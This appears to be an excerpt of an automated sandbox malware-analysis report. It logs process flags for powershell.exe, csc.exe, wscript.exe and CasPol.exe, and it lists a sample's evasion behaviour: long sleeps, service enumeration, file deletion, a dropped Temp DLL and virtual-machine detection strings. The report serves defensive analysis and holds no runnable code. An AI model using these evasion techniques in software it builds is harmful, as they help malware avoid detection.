                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                        Malware Analysis System Evasion

                        barindex
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0040E54F Sleep,ExitProcess,12_2_0040E54F
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,12_2_004198C2
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7260Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2404Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3095Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6616Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow / User API: threadDelayed 9371Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow / User API: foregroundWindowGot 1769Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\xduntapu\xduntapu.dllJump to dropped file
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1352Thread sleep count: 7260 > 30Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1352Thread sleep count: 2404 > 30Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5572Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3624Thread sleep time: -19369081277395017s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 4312Thread sleep count: 218 > 30Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 4312Thread sleep time: -109000s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5740Thread sleep count: 164 > 30Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5740Thread sleep time: -492000s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5740Thread sleep count: 9371 > 30Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 5740Thread sleep time: -28113000s >= -30000sJump to behavior
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,12_2_0040B335
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,12_2_0041B42F
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,12_2_0040B53A
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,12_2_004089A9
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00406AC2 FindFirstFileW,FindNextFileW,12_2_00406AC2
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,12_2_00407A8C
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW,12_2_00418C69
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,12_2_00408DA7
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,12_2_00406F06
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: powershell.exe, 00000003.00000002.1827619214.0000000005368000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
                        Source: powershell.exe, 00000003.00000002.1827619214.0000000005368000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
                        Source: powershell.exe, 00000003.00000002.1834189157.0000000008800000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW3
                        Source: wscript.exe, 00000006.00000002.1827675501.0000000004CF0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}#
                        Source: CasPol.exe, 0000000C.00000002.4167187293.0000000000BF8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllT
                        Source: powershell.exe, 00000003.00000002.1834189157.000000000883F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                        Source: powershell.exe, 00000007.00000002.2252811234.000000000BA61000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 4'^qemU
                        Source: powershell.exe, 00000007.00000002.2142432140.0000000006FB1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll}
